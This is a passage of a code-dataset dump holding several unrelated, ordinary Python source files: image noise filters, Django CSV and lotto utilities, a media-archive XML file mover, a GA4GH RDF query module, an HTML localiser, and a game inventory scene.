1):\r\n\r\n kernel[i - from_x, j - from_y] = image[i,j]\r\n\r\n return kernel\r\n\r\n\r\ndef get_median(vector):\r\n vector = np.sort(vector)\r\n median = vector[int(math.floor(len(vector)/2))]\r\n return median\r\n\r\n\r\ndef medianFiltering(filter_size, image):\r\n filtered_image = image\r\n num_rows = image.shape[1]\r\n num_cols = image.shape[0]\r\n\r\n #asumimos que el kernel es simetrico y dimensiones impares\r\n edge = int(math.floor(filter_size[0]/2))\r\n\r\n for i in range(edge, num_rows - edge):\r\n for j in range(edge, num_cols - edge):\r\n kernel = fill_kernel(i,j, filter_size, image)\r\n filtered_image[i,j] = get_median(kernel.flatten())\r\n\r\n\r\n return filtered_image\r\n#-----------------------------------------------------------------\r\n#Funcion: filtro para ruido gaussiano\r\ndef harmonicMeanFilter(noise_img, window):\r\n img = noise_img.copy()\r\n rows, cols = img.shape\r\n\r\n #the pad refers to the number of external pixels(border) not considered when filter the borders\r\n pad = int(window/2)\r\n\r\n\r\n for i in range(pad, rows-pad):\r\n for j in range(pad, cols-pad):\r\n pixels_sum = 0\r\n for k in range(window):\r\n for l in range(window):\r\n\r\n pixels_sum += 1/((img[i-pad+l, j-pad+k])+0.00000001)\r\n\r\n img[i,j] = window*window /(pixels_sum+0.000000001)\r\n\r\n\r\n return img\r\n#--------------------------------------------------------------\r\nimage = cv2.imread('lena.jpg',0) #imagen leida\r\nsp_img = sp_noise(image,0.10) #imagen con ruido sal y pimienta\r\ngauss_img = gauss_noise(image) #imagen con ruido 
gaussiano\r\n#cv2.imshow('salt',sp_img)\r\n#----------------------------------------------------------\r\n#Aplicamos filtro para sal y pimienta\r\nkernel_size = (3, 3) #kernel para filtro\r\nsaltpepper = sp_img.copy()\r\nmedian_filtered_image = medianFiltering(kernel_size, saltpepper) #imagen aplicando median filter\r\n#cv2.imshow('median filter',median_filtered_image)\r\n#------------------------------------------------------------\r\n#Aplicamos filtro para imagen ruido gausiano\r\nharmonic_filtered_image = harmonicMeanFilter(gauss_img,3)\r\n#cv2.imshow('harmonic',harmonic_filtered_image)\r\n#-------------------------------------------------------------\r\n#Mostramos las imagenes\r\nrow1 = np.hstack((sp_img,gauss_img))\r\nrow2 = np.hstack((median_filtered_image,harmonic_filtered_image))\r\nresult = np.vstack((row1,row2))\r\ncv2.imshow('Salt and pepper -> Median Filter|| Gaussian -> Harmonic Filter',result)\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","sub_path":"Lab5/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":4212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"330521422","text":"import numpy\n\nall_distances = []\nall_centroids = []\nwith open('./data/restaurants.txt') as f:\n for line in f:\n distance = float(line.split('||')[4].strip())\n if distance < 50:\n all_centroids.append([entry.strip() for entry in line.split('||')])\n all_distances.append(distance)\n\n\nprint(all_distances)\nmax_distance = numpy.max(all_distances)\n\nprint(\"max_distance = \", max_distance)\n\nwith open('./data/restaurants.new.txt', 'w') as f:\n for centroid in all_centroids:\n centroid[1] = float(centroid[1]) / 5\n centroid[2] = float(centroid[2]) / 4\n centroid[4] = float(centroid[4]) / max_distance\n f.write('||'.join((centroid[0], str(centroid[1]), str(centroid[2]), str(centroid[3]), str(centroid[4]), '\\n')))\n\n","sub_path":"scripts/fix_algorithm_again_again.py","file_name":"fix_algorithm_again_again.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641890250","text":"\"\"\"유틸 함수.\"\"\"\nimport base64\nimport csv\nimport json\nimport typing\n\nimport lz4.frame\nimport requests\nfrom django import forms\nfrom django.contrib import admin\nfrom django.core import exceptions, serializers\nfrom django.core.paginator import Paginator\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect, render\nfrom django.urls import path\n\nfrom .models import Lotto\n\n\nclass CsvImportForm(forms.Form):\n \"\"\"CSV Import 시 사용할 Form.\"\"\"\n\n csv_file = forms.FileField()\n\n\nclass ExportCsvMixin(admin.ModelAdmin):\n \"\"\"CSV Export 기능 제공용 Mixin.\"\"\"\n\n csv_file = forms.FileField()\n field_names = None\n\n def export_as_csv(self, request, queryset):\n \"\"\"CSV으로 Export.\"\"\"\n meta = self.model._meta\n if self.field_names:\n field_names = self.field_names\n else:\n field_names = [field.name for field in meta.fields]\n\n response = HttpResponse(content_type=\"text/csv\")\n response[\"Content-Disposition\"] = \"attachment; filename={}.csv\".format(meta)\n writer = csv.writer(response)\n\n writer.writerow(field_names)\n for obj in queryset:\n writer.writerow([getattr(obj, field) for field in field_names])\n\n return response\n\n export_as_csv.short_description = \"Export Selected\"\n\n def get_urls(self):\n \"\"\"Get urls.\"\"\"\n urls = super().get_urls()\n my_urls = [\n path(\"import-csv/\", self.import_csv),\n ]\n 
return my_urls + urls\n\n def import_csv(self, request):\n \"\"\"Import CSV File.\"\"\"\n if request.method == \"POST\":\n csv_file = request.FILES[\"csv_file\"]\n reader = csv.DictReader(\n csv_file.read().decode(\"utf-8\").splitlines(), delimiter=\",\"\n )\n for r in reader:\n if \"id\" in r:\n r[\"id\"] = int(r[\"id\"])\n obj = self.model(**r)\n obj.save()\n\n self.message_user(request, \"Your csv file has been imported\")\n return redirect(\"..\")\n form = CsvImportForm()\n payload = {\"form\": form}\n return render(request, \"admin/csv_form.html\", payload)\n\n\ndef new_lotto(draw_number):\n \"\"\"로또 정보.\"\"\"\n is_new = False\n try:\n obj = Lotto.objects.get(draw_number=draw_number)\n result = obj.numbers\n except exceptions.ObjectDoesNotExist:\n try:\n params = {\n \"method\": \"getLottoNumber\",\n \"drwNo\": draw_number,\n }\n # https://www.nlotto.co.kr/common.do?method=getLottoNumber&drwNo=912\n result = requests.get(\"https://www.nlotto.co.kr/common.do\", params=params)\n result = json.loads(result.text)\n if not result[\"returnValue\"] == \"fail\":\n obj = Lotto(draw_number=draw_number, numbers=result)\n obj.save()\n is_new = True\n except Exception as e:\n result = str(e)\n\n return result, is_new\n\n\ndef get_page_info(object_list, page, count):\n \"\"\"페이지 정보.\"\"\"\n paginator = Paginator(object_list, count)\n p = paginator.page(page)\n\n start_10 = (page - 1) // 10 * 10 + 1\n end_10 = min(start_10 + 9, paginator.num_pages)\n\n page_list = [i for i in range(start_10, end_10 + 1)]\n\n page_info = {\n \"page\": page,\n \"prev\": page - 1 if p.has_previous() else 0,\n \"next\": page + 1 if p.has_next() else 0,\n \"page_list\": page_list,\n }\n\n return p, page_info\n\n\ndef get_compressed_result(image_list, count, page):\n \"\"\"데이터 압축해서 제공.\"\"\"\n paginator = Paginator(image_list, count)\n p = paginator.page(page)\n\n image_list = serializers.serialize(\"json\", p)\n\n result = {\"has_next\": p.has_next(), \"image_list\": json.loads(image_list)}\n\n compressed = lz4.frame.compress(json.dumps(result).encode(\"utf-8\"))\n return HttpResponse(base64.b85encode(compressed))\n\n\ndef to_table(contents: typing.List, row_count: int) -> typing.List[typing.List]:\n \"\"\"\n 테이블 형태로 grouping.\n\n :param contents: list 형태의 데이터.\n :param row_count: 한줄에 포함될 element 개수\n :return: grouping 된 테이블\n \"\"\"\n row = []\n table = []\n for count, img in enumerate(contents):\n row.append(img)\n count += 1\n\n if count % row_count == 0:\n table.append(row)\n row = []\n if row:\n table.append(row)\n\n return table\n","sub_path":"dashboard/book/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"229579830","text":"# Created by Choon Hian \n# 8 March 2017\n# This script takes in a DIVA TAPE XML file, scans for Clips (Items/Objects) inside the DIVA TAPE XML file.\n# Then, go into the \"temp_store\" folder, and move all the Dalet Clip XML files which are found inside this particular DIVA TAPE XML FILE, one level up.\n\n\nfrom lxml import etree\nfrom lxml import _elementpath\nimport gzip\nimport os\nimport argparse\n\n# DIVA_TAPE_XML_FILENAME = 'tapeset-A00320.xml'\n\n# Remember to put a / at the end if there is a folder\n# Step up 2 times from the .exe file's location\nDIRECTORY_DALET_XML = '../../temp_store/' \nFILE_HAS_BEEN_MOVED_DALET_XML_DIR = '../../' \n\n\nprint(\"Make sure the DIVA TAPE XML of the tape you are migrating \\nis in the \\\"DumpDivaTapeXMLHere\\\" 
folder!\")\nprint('')\nprint('')\nprint('Enter filename of DIVA TAPE XML,')\nDIVA_TAPE_XML_FILENAME = raw_input(\"eg: \\\"tapeset-A00320.xml\\\": \")\nprint('')\nprint('')\n\n\n\n# Open the DIVA xml file\ntapeXML = etree.parse('../../DumpDivaTapeXMLHere/'+DIVA_TAPE_XML_FILENAME)\n\n# Make a list of all the attributes of objectName\nobjectNameList = tapeXML.xpath('//@objectName')\n\n# Loop through the list\nfor n,i in enumerate(objectNameList):\n\t# define a seperator as '.'\n\tseperator = '.'\n\n\t# get objectName before seperator\n\tobjectNameBeforeSeperator = objectNameList[n].split(seperator,1)[0]\n\t# print objectNameBeforeSeperator\n\n\t# replace all objectNames with objectNames that do not have the suffix\n\tobjectNameList[n] = objectNameBeforeSeperator\n\n\n\n# Print the list of clips\n# print 'CLIPS IN THIS DIVA TAPE'\n# print objectNameList\n\n\n# Print the total number of clips in the tape\nprint ('Total number of clips found in DIVA TAPE XML = ',len(objectNameList))\nprint('')\nprint('')\n\n\n\n# Cycle through the folder of dalet XMLs \ndirectory = DIRECTORY_DALET_XML\ndaletClipsList = []\ncountMovedClips = 0\nfor filename in os.listdir(directory):\n\t# remove the part of filename after '-'\n\tseperator2 = '_'\n\tfilenameBeforeSeperator = filename.split(seperator2,1)[0]\n\t# print filenameBeforeSeperator\n\tdaletClipsList.append(filenameBeforeSeperator)\n\n\t# Check whether this filename appears in the array of diva tape objects\n\tif any(filenameBeforeSeperator in s for s in objectNameList):\n\t\t# print filenameBeforeSeperator\n\t\t# print 'yes'\n\t\tcountMovedClips = countMovedClips + 1\n\n\t\t# MOVE THE FILE!\n\t\tos.rename(DIRECTORY_DALET_XML + '' + filename, FILE_HAS_BEEN_MOVED_DALET_XML_DIR + '' + filename)\n\n\nprint ('Number of DALET XMLs moved = ',countMovedClips)\nprint('')\nprint('')\nraw_input(\"Press ENTER to close this window.\")\n","sub_path":"FINAL_SCRIPT.py","file_name":"FINAL_SCRIPT.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"459591867","text":"\n\nfrom xai.brain.wordbase.nouns._debility import _DEBILITY\n\n#calss header\nclass _DEBILITIES(_DEBILITY, ):\n\tdef __init__(self,): \n\t\t_DEBILITY.__init__(self)\n\t\tself.name = \"DEBILITIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"debility\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_debilities.py","file_name":"_debilities.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"222777803","text":"\"\"\"\nModule responsible for translating g2p data into GA4GH native\nobjects.\n\"\"\"\n\nimport rdflib\nimport urlparse\nimport time\nimport sets\n\nimport ga4gh.protocol as protocol\nimport ga4gh.exceptions as exceptions\n\n\nclass G2PDataset:\n \"\"\"\n An rdf object store. 
The cancer genome database\n [Clinical Genomics Knowledge Base]\n (http://nif-crawler.neuinfo.org/monarch/ttl/cgd.ttl)\n published by the Monarch project was the source of Evidence.\n \"\"\"\n\n def __init__(self, sources):\n \"\"\"\n Initialize dataset, using the passed dict of sources\n [{source,format}] see rdflib.parse() for more\n \"\"\"\n\n self._searchQuery = \"\"\"\n PREFIX OBAN: \n PREFIX OBO: \n PREFIX rdfs: \n PREFIX faldo: \n PREFIX rdf: \n SELECT %PROPERTIES%\n WHERE {\n ?s a OBAN:association .\n ?s OBAN:association_has_subject ?l .\n ?l rdfs:label ?location_label .\n %LOCATION%\n ?s OBO:RO_has_environment ?drug .\n ?drug rdfs:label ?drug_label .\n ?s OBAN:association_has_object ?d .\n ?d rdfs:label ?disease_label .\n ?d rdf:type ?disease .\n ?s OBAN:association_has_object_property ?evidence .\n OPTIONAL { ?evidence rdfs:label ?evidence_label } .\n %FILTER%\n }\n \"\"\"\n\n # initialize graph\n self._rdfGraph = rdflib.ConjunctiveGraph()\n\n # load with data\n for source in sources:\n if not source['format']:\n self._rdfGraph.parse(source['source'])\n else:\n self._rdfGraph.parse(source['source'],\n format=source['format'])\n\n # TODO is this necessary?\n self.associationsLength = 0\n # log queries that take more than N seconds\n self.RESPONSETIME_LOGGING_THRESHOLD = 2\n\n def _search(self, request):\n offset = request.offset\n\n now = time.time()\n associations = self.queryLabels(\n request.feature, request.evidence, request.phenotype,\n request.pageSize, offset)\n responseTime = time.time()-now\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('_search', responseTime)\n print(request)\n\n self.associationsLength = len(associations)\n for association in associations:\n yield association\n\n def queryLabels(\n self, location=None, drug=None, disease=None, pageSize=None,\n offset=0):\n\n \"\"\"\n This query is the main search mechanism.\n It queries the graph for annotations that match the\n AND of [location,drug,disease].\n \"\"\"\n query = self.formatQuery(location, drug, disease)\n\n query = query.replace(\"%PROPERTIES%\",\n \"distinct ?s ?location ?location_label \" +\n \"?disease ?disease_label ?drug ?drug_label\")\n\n query += (\"LIMIT {} OFFSET {} \".format(pageSize, offset))\n\n now = time.time()\n results = self._rdfGraph.query(query)\n\n # Depending on the cardinality this query can return multiple rows\n # per annotations. 
Here we reduce it to a list of unique annotations\n # URIs\n uniqueAnnotations = sets.Set()\n for row in results:\n uniqueAnnotations.add(\"<{}>\".format(row['s'].toPython()))\n\n # now fetch the details on the annotation\n annotations = []\n for annotation in uniqueAnnotations:\n annotations.append(\n self.toGA4GH(\n self.query(annotation)))\n responseTime = time.time()-now\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('queryLabels', responseTime)\n print('len(annotations)', len(annotations))\n print(query)\n\n return annotations\n\n def formatQuery(self, location=None, drug=None, disease=None):\n \"\"\"\n Generate a formatted sparql query with appropriate filters\n \"\"\"\n query = self._searchQuery\n if location is None and drug is None and disease is None:\n raise exceptions.NotImplementedException(\n \"At least one of [location, drug, disease] must be specified\")\n filters = []\n\n if location and isinstance(location, basestring):\n filters.append('regex(?location_label, \"{}\")'.format(location))\n if drug and isinstance(drug, basestring):\n filters.append('regex(?drug_label, \"{}\")'.format(drug))\n if disease and isinstance(disease, basestring):\n filters.append('regex(?disease_label, \"{}\")'.format(disease))\n\n locationClause = \"\"\n if isinstance(location, dict):\n locations = []\n for id in location['ids']:\n locations.append('?location = <{}> '.format\n (id['database'] + id['identifier']))\n locationClause = \"({})\".format(\" || \".join(locations))\n filters.append(locationClause)\n locationClause = \"?l faldo:location ?location .\\n\"\n\n if isinstance(drug, dict):\n drugs = []\n for id in drug['ids']:\n drugs.append('?drug = <{}> '.format\n (id['database'] + id['identifier']))\n drugsClause = \"({})\".format(\" || \".join(drugs))\n\n filters.append(drugsClause)\n\n if isinstance(disease, dict):\n diseases = []\n for id in disease['ids']:\n diseases.append('?disease = <{}> '.format\n (id['database'] + id['identifier']))\n diseasesClause = \"({})\".format(\" || \".join(diseases))\n filters.append(diseasesClause)\n\n filter = \"FILTER ({})\".format(' && '.join(filters))\n query = query.replace(\"%FILTER%\", filter)\n query = query.replace(\"%LOCATION%\", locationClause)\n return query\n\n def query(self, subject=''):\n \"\"\"\n This is the 'detail' query\n\n Return a list of dictionaries.\n Each dict is an [annotation](http://www.w3.org/ns/oa#Annotation)\n All keys in the dict are predicates of the annotation.\n All cells in the dict are predicate->object converted to strings.\n\n If an annotation has a \n predicate that class is appended to the annotation dict in the\n 'location' property\n \"\"\"\n\n annotationQuery = \"\"\"\n PREFIX OBAN: \n PREFIX rdfs: \n SELECT distinct *\n WHERE {\n %SUBJECT% ?p ?o .\n OPTIONAL {?o rdfs:label ?label .}\n }\n \"\"\"\n\n annotationQuery = annotationQuery.replace(\"%SUBJECT%\", subject)\n now = time.time()\n results = self._rdfGraph.query(annotationQuery)\n rows = [row.asdict() for row in results]\n responseTime = time.time()-now\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('annotationQuery', responseTime)\n print(annotationQuery)\n\n for row in rows:\n for k in row:\n row[k] = row[k].toPython()\n row['s'] = subject\n\n locationQueryTemplate = \"\"\"\n PREFIX rdfs: \n PREFIX OBO: \n SELECT distinct *\n WHERE {\n %SUBJECT% a OBO:SO_0001059 .\n %SUBJECT% ?p ?o .\n OPTIONAL {?o rdfs:label ?label .} .\n }\n \"\"\"\n\n locationRows = []\n uniqueLocations = sets.Set()\n for row in rows:\n if row['p'] == 
'http://purl.org/oban/association_has_subject':\n uniqueLocations.add(\"<\" + row['o'] + \">\")\n\n for location in uniqueLocations:\n locationQuery = locationQueryTemplate.replace(\n \"%SUBJECT%\", location)\n results = self._rdfGraph.query(locationQuery)\n locationRows = [locationRow.asdict() for locationRow in results]\n for locationRow in locationRows:\n for k in locationRow:\n locationRow[k] = locationRow[k].toPython()\n locationRow['s'] = location\n if responseTime > self.RESPONSETIME_LOGGING_THRESHOLD:\n print('locationQuery', responseTime)\n print(locationQuery)\n\n annotation = self.flatten(rows)\n location = self.flatten(locationRows)\n annotation['location'] = location\n return annotation\n\n def flatten(self, dict):\n \"\"\"\n Given a dict of dicts,\n flatten it to a single dict using predicate as keys\n For multiple occurrences of a predicate, create an array\n Each value in the dict is an object {val:'x', label:'y'}\n The value of 's' (subject) is copied to the 'id' property\n \"\"\"\n a = {}\n for row in dict:\n obj = {'val': row['o']}\n if 'label' in row:\n obj['label'] = row['label']\n\n if row['p'] in a and \\\n a[row['p']].__class__.__name__ != \"list\":\n asIs = a[row['p']]\n a[row['p']] = []\n a[row['p']].append(asIs)\n\n if row['p'] in a:\n a[row['p']].append(obj)\n else:\n a[row['p']] = obj\n\n a['id'] = row['s']\n return a\n\n def toGA4GH(self, annotation):\n \"\"\"\n given an annotation dict, return a protocol.FeaturePhenotypeAssociation\n \"\"\"\n\n fpa = None\n\n # annotation keys\n source = 'http://purl.org/dc/elements/1.1/source'\n location = 'location'\n evidenceURI = 'http://purl.obolibrary.org/obo/RO_0002558'\n hasObject = 'http://purl.org/oban/association_has_object'\n # location keys\n GENO_0000408 = 'http://purl.obolibrary.org/obo/GENO_0000408'\n\n location = annotation['location']\n if GENO_0000408 in location:\n id_, ontologySource = self.namespaceSplit(\n location[GENO_0000408]['val'])\n name = location[GENO_0000408]['label']\n else:\n id_, ontologySource = self.namespaceSplit(location['id'])\n name = location['id']\n\n f = protocol.Feature()\n f.featureType = protocol.OntologyTerm.fromJsonDict({\n \"name\": name,\n \"id\": id_,\n \"ontologySource\": ontologySource})\n f.id = annotation['id']\n f.featureSetId = ''\n f.parentIds = []\n f.attributes = protocol.Attributes.fromJsonDict({\"vals\": {}})\n\n # # debugger example how to validate and capture validation errors\n # if not protocol.Feature.validate(f.toJsonDict()):\n # e = exceptions.RequestValidationFailureException(\n # f.toJsonDict(),protocol.Feature)\n # print(e.message)\n # from IPython.core.debugger import Pdb ; Pdb().set_trace()\n\n id_, ontologySource = self.namespaceSplit(\n annotation[hasObject]['val'])\n\n fpa = protocol.FeaturePhenotypeAssociation()\n fpa.id = annotation['id']\n fpa.features = [f]\n fpa.description = None\n fpa.evidence = []\n fpa.environmentalContexts = []\n\n phenotypeInstance = protocol.PhenotypeInstance()\n phenotypeInstance.type = protocol.OntologyTerm.fromJsonDict({\n \"name\": annotation[hasObject]['label'],\n \"id\": id_,\n \"ontologySource\": ontologySource})\n fpa.phenotype = phenotypeInstance\n\n # ECO or OBI is recommended\n if source in annotation:\n if not isinstance(annotation[source], list):\n annotation[source] = [annotation[source]]\n for src in annotation[source]:\n evidence = protocol.Evidence()\n evidence.evidenceType = protocol.OntologyTerm()\n id_, ontologySource = self.namespaceSplit(src['val'])\n evidence.evidenceType.ontologySource = 
ontologySource\n evidence.evidenceType.id = id_\n\n evidence.evidenceType.name = ''\n if 'label' in annotation[evidenceURI]:\n evidence.evidenceType.name = \\\n annotation[evidenceURI]['label']\n fpa.evidence.append(evidence)\n if not protocol.Evidence.validate(evidence.toJsonDict()):\n raise exceptions.RequestValidationFailureException(\n evidence.toJsonDict(), protocol.Evidence)\n\n return fpa\n\n def namespaceSplit(self, url, separator='/'):\n \"\"\"\n given a url return the id of the resource and the ontology source\n \"\"\"\n o = urlparse.urlparse(url)\n _id = o.path.split(separator)[-1]\n ontologySource = urlparse.urlunsplit([o[0],\n o[1],\n o[2].replace(_id, ''),\n o[4], ''])\n return _id, ontologySource\n","sub_path":"ga4gh/datamodel/genotype_phenotype.py","file_name":"genotype_phenotype.py","file_ext":"py","file_size_in_byte":13570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"475723576","text":"#!/usr/bin/python3\n\n# Usage: ./localise-html.py -c config.conf index.html < assets/strings/bar.json > build/index.bar.html\n\nread_conf = __import__('read-conf')\nimport argparse\nfrom html.parser import HTMLParser\nfrom sys import stdin, stderr, argv\nfrom os import listdir, path\nimport json, re\n\nrtl_languages = ['heb', 'ara', 'pes', 'urd', 'uig']\n\nclass DataTextHTMLParser(HTMLParser):\n data_text = None\n output = []\n\n def p(self, value):\n self.output.append(value)\n\n def run_replacements(self, text):\n for k in self.replacements:\n text = text.replace('{{%s}}'%(k,), self.replacements[k])\n return text\n\n def handle_startendtag(self, tag, attrs):\n # We don't handle data-text on tags like and , but\n # that doesn't quite make sense either\n if tag == \"link\" and ('id', 'rtlStylesheet') in attrs:\n text = self.get_starttag_text()\n self.p(text[:text.index('/>')] + ('enabled' if self.localename in rtl_languages else 'disabled' ) + ' />')\n print(text, text[:text.index('/>')])\n else:\n self.p(self.get_starttag_text())\n\n def handle_starttag(self, tag, attrs):\n \"\"\"This is where localisation happens\"\"\"\n attr_localization = list(filter(lambda x: x[0] == \"data-textattr\", attrs))\n if not attr_localization:\n for attr in attrs:\n if attr[0] == \"data-text\" and attr[1] in self.locale:\n text = self.locale[attr[1]]\n if text.startswith(\"%%UNAVAILABLE\"):\n text = self.fallback_locale[attr[1]]\n self.data_text = self.run_replacements(text)\n\n \"\"\"This is where html's dir attribute is set to ltr or rtl\"\"\"\n if tag == \"html\":\n text = self.get_starttag_text()\n self.p('config.LANGNAMES['%s']=%s\\n \" % (\n self.localename,\n self.locale[\"@langNames\"]))\n self.p(\"\" % (tag,))\n def handle_data(self, data):\n if self.data_text:\n self.p(self.data_text)\n self.data_text = None\n else:\n self.p(data)\n def handle_comment(self, data):\n self.p(\"\" %(data,))\n def handle_entityref(self, name):\n self.p(\"&%s;\"%(name,))\n def handle_charref(self, name):\n self.p(\"&#%s;\" % (name,))\n def handle_decl(self, data):\n self.p(\"\" % (data,))\n def handle_pi(self, data):\n self.p(\"\" % (data,))\n\ndef run(html_path, json_path, out_path, conf_path, fallback_path):\n try:\n # convert_charrefs will default to True in py3.5:\n parser = DataTextHTMLParser(convert_charrefs=False)\n except TypeError:\n # convert_charrefs was added in py3.4:\n parser = DataTextHTMLParser()\n parser.locale = json.loads(\"\".join(open(json_path).readlines()))\n parser.localename = path.basename(json_path).replace('.json', '')\n 
parser.fallback_locale = json.loads(\"\".join(open(fallback_path).readlines()))\n parser.replacements = read_conf.load_conf(conf_path)['REPLACEMENTS']\n parser.feed(\"\".join(open(html_path).readlines()))\n with open(out_path, 'w') as out:\n out.write(\"\".join(parser.output))\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser(description='Localise an HTML file using a json file from stdin')\n argparser.add_argument('template', help='HTML file to localise')\n argparser.add_argument('localisations', help='JSON file to use to localise')\n argparser.add_argument('output', help='Output file')\n argparser.add_argument('-c', '--config', default='config.conf', help='Config file name (default: config.conf)')\n argparser.add_argument('-f', '--fallback', default='build/strings/eng.json', help='Fallback JSON file to use when main one gives no answer')\n\n args = argparser.parse_args()\n\n run(args.template, args.localisations, args.output, args.config, args.fallback)\n","sub_path":"localise-html.py","file_name":"localise-html.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"331950178","text":"import logging\nfrom typing import Any, Callable, Iterable, List, NamedTuple, Optional, Tuple\n\nfrom data.constants import SCREEN_SIZE, BackgroundImages\nfrom events.events_base import (BasicEvents, EventListener, EventType,\n InventorySelectionEvent,\n InventoryTransferEvent)\nfrom models.characters.chassis import Chassis\nfrom models.characters.mods_base import Mod, SlotTypes\nfrom models.characters.player import get_player\nfrom models.scenes.layouts import Layout\nfrom models.scenes.scenes_base import BasicResolution, Resolution, Scene\n\n\nclass SlotHeaderInfo(NamedTuple):\n \"\"\"Data represented in the header row of an inventory slot.\"\"\"\n slot: SlotTypes\n capacity: int\n mods: Tuple[Mod, ...]\n\n @property\n def num_filled(self) -> int:\n return len(self.mods)\n\n\nclass SlotRowInfo(NamedTuple):\n \"\"\"Data represented by single row of an inventory slot.\"\"\"\n mod: Mod\n is_selected: bool\n\n\nclass SelectedModInfo(NamedTuple):\n \"\"\"Data representing information about the selected Mod.\"\"\"\n mod: Mod\n\n\nclass InventoryScene(Scene, EventListener):\n\n def __init__(self, prev_scene_loader: Callable[[], Scene],\n loot_mods: Callable[[], Iterable[Mod]] = None) -> None:\n \"\"\"\n\n Args:\n prev_scene_loader: Zero-argument function that returns the previous\n scene.\n loot_mods: Zero-argument function that returns the mods on the\n ground.\n \"\"\"\n super().__init__()\n self._background_image = BackgroundImages.INVENTORY.path\n self._player = get_player()\n self._selected_mod: Optional[Mod] = None\n if loot_mods is not None:\n self._mods_on_ground = list(loot_mods())\n else:\n self._mods_on_ground = []\n self._update_layout()\n self._resolution = BasicResolution(prev_scene_loader)\n self._is_resolved = False\n self._UI_error_message: str = ''\n\n def notify(self, event: EventType) -> None:\n if isinstance(event, InventorySelectionEvent):\n if self._selected_mod is event.mod:\n self._selected_mod = None\n else:\n self._selected_mod = event.mod\n self._update_layout()\n if isinstance(event, InventoryTransferEvent):\n # Check that transfer is valid\n if self._selected_mod is None:\n return\n new_slot = event.new_slot\n valid_slots = self._selected_mod.valid_slots() + [SlotTypes.GROUND]\n if new_slot not in valid_slots:\n self._UI_error_message = 'Invalid slot'\n return\n chassis 
= self._player.chassis\n if self._selected_mod in chassis.mods_in_slot(new_slot):\n return # Mod already in the specified slot.\n if chassis.slot_full(new_slot) and new_slot != SlotTypes.GROUND:\n self._UI_error_message = 'Slot full'\n return\n\n # Carry out valid transfer, accounting for GROUND slot which is not\n # actually a chassis slot.\n if new_slot == SlotTypes.GROUND:\n chassis.remove_mod(self._selected_mod)\n self._mods_on_ground.append(self._selected_mod)\n logging.debug('Moving {} to ground.'.format(self._selected_mod))\n else:\n if self._selected_mod in self._mods_on_ground:\n self._mods_on_ground.remove(self._selected_mod)\n chassis.transfer_mod(self._selected_mod, new_slot)\n if event == BasicEvents.INVENTORY:\n self._is_resolved = True\n\n @property\n def layout(self) -> Layout:\n return self._layout\n\n @property\n def selected_mod(self) -> Optional[Mod]:\n return self._selected_mod\n\n @property\n def UI_error_message(self) -> str:\n return self._UI_error_message\n\n @property\n def background_image(self) -> str:\n return self._background_image\n\n def is_resolved(self) -> bool:\n return self._is_resolved\n\n def get_resolution(self) -> Resolution:\n assert self.is_resolved()\n res = self._resolution\n del self._resolution\n return res\n\n def _update_layout(self) -> None:\n\n # The layout associates scene data with different rects on the screen.\n # These rects are used to process mouse clicks and to determine how to\n # draw the scene. For example, a given mod stored in one of the slot\n # categories is associated with the rect where it will show up on the\n # screen.\n chassis = self._player.chassis\n\n # Left half of screen, composed of chassis slots\n\n capacities = chassis.slot_capacities\n\n fillable_slots = [slot for slot in SlotTypes\n if capacities.get(slot, 0) > 0\n and slot != SlotTypes.STORAGE]\n\n rows_per_column = 15\n\n # Left half of left column\n num_rows = 0\n slot_elems_0 = []\n for slot in fillable_slots[:3]:\n data = _slot_header(slot, chassis)\n num_rows += _DEFAULT_ROWS_PER_SLOT + 1\n slot_elems_0.extend(\n [(self._slot_layout(data), _DEFAULT_ROWS_PER_SLOT), (None, 1)])\n assert slot_elems_0\n # Don't need final gap\n slot_elems_0.pop()\n num_rows -= 1\n\n # Padding on bottom of column for consistent row number\n if num_rows < rows_per_column:\n slot_elems_0.append((None, rows_per_column - num_rows))\n\n chassis_col_0 = Layout(slot_elems_0)\n\n # Right half of left column has extra space for the storage slot\n num_rows = 0\n slot_elems_1 = []\n for slot in fillable_slots[3:]:\n data = _slot_header(slot, chassis)\n num_rows += _DEFAULT_ROWS_PER_SLOT + 1\n slot_elems_1.extend(\n [(self._slot_layout(data), _DEFAULT_ROWS_PER_SLOT), (None, 1)])\n storage_data = _slot_header(SlotTypes.STORAGE, chassis)\n storage_rows = storage_data.num_filled + 1\n slot_elems_1.append((self._slot_layout(storage_data, storage_rows),\n storage_rows))\n num_rows += storage_rows\n\n if num_rows < rows_per_column:\n slot_elems_1.append((None, rows_per_column - num_rows))\n chassis_col_1 = Layout(slot_elems_1)\n\n left_half = Layout([(None, 1), (chassis_col_0, 10), (None, 1),\n (chassis_col_1, 10), (None, 1)], 'horizontal')\n\n # Right half of screen, containing mod information (if present) and\n # loot slots (if present)\n\n # selected mod information\n\n if self._selected_mod is not None:\n info = SelectedModInfo(self._selected_mod)\n mod_info_layout = Layout([(None, 1), (info, 3), (None, 1)],\n 'horizontal')\n mod_info_layout = Layout([(None, 1), (mod_info_layout, 5),\n 
